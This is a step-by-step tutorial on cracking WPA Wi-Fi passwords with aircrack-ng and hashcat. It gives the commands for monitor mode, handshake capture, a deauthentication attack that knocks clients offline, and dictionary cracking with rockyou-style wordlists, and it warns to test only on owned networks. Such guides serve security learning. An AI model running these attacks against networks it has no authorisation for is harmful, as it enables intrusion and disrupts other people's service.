This article describes step by step the process of hacking a Wi-Fi network using Kali Linux and tools such as aircrack-ng and hashcat.
The main stages include enabling monitor mode, capturing a handshake using a deauthentication attack, converting the capture file using hashcat.net/cap2hashcat, and brute-forcing the password using wordlists.
The method works mainly against weak passwords and should only be tested on networks you own.
Table of Contents
- Preparation
- Step 1: Monitoring the Air
- Step 2: Capturing the Handshake
- Step 3: Converting the Capture File
- Step 4: Brute Force with Hashcat
- Wordlists
- Conclusion
Preparation
First update the repositories and obtain superuser privileges:
sudo su
apt update && apt upgrade
Step 1: Monitoring the Air
Switch the network adapter to monitor mode so it can capture all packets within range.
Check your wireless interface:
iwconfig
Look for the name of your Wi-Fi adapter (usually wlan0).
Enable monitor mode:
airmon-ng start wlan0
The interface name will usually change to wlan0mon.
Now scan for nearby networks:
airodump-ng wlan0mon
Look for the following information:
- BSSID — router MAC address
- CH — channel
Step 2: Capturing the Handshake
To recover the password we must capture a WPA handshake, which happens when a client connects to the router.
Start packet capture:
airodump-ng --bssid {MAC} -c {CH} --write WPAcrack wlan0mon
Speeding up the process (Deauth attack)
To avoid waiting for a client to reconnect, we can force a temporary disconnection:
aireplay-ng --deauth 20 -a {MAC} wlan0mon
When the message WPA Handshake appears in the top corner of airodump-ng, the capture is successful.
Step 3: Converting the Capture File
The .cap file captured by airodump-ng contains a lot of additional network traffic.
Hashcat cannot use it directly, so it must be converted.
Official converter:
https://hashcat.net/cap2hashcat/
Steps:
- Upload the file
WPAcrack-01.cap - The service analyzes the capture
- It generates a file with extension
.hc22000
This file contains the cleaned hash ready for password cracking.
If the .cap file contains several handshakes, the service may detect multiple networks.
Step 4: Brute Force (Hashcat)
Now we move to the most resource-intensive step — password cracking using GPU acceleration.
Use hash mode 22000, which is the modern WPA standard.
Example command:
hashcat.exe -m 22000 WPAcrack.hc22000 -a0 ../rockyou.txt ../3WiFi_cnt_WiFiKey.txt
To display the cracked password:
hashcat.exe -m 22000 WPAcrack.hc22000 --show
Wordlists
Password recovery depends heavily on the quality of the wordlist.
Common sources include:
- rockyou.txt
- custom generated dictionaries
- community wordlists
Conclusion
This method works mainly against simple passwords that exist in wordlists such as rockyou.
Strong passwords with random characters are significantly harder to crack.
⚠️ Important
Perform tests only on networks you own.
Unauthorized access to other networks may violate the law.
Top comments (0)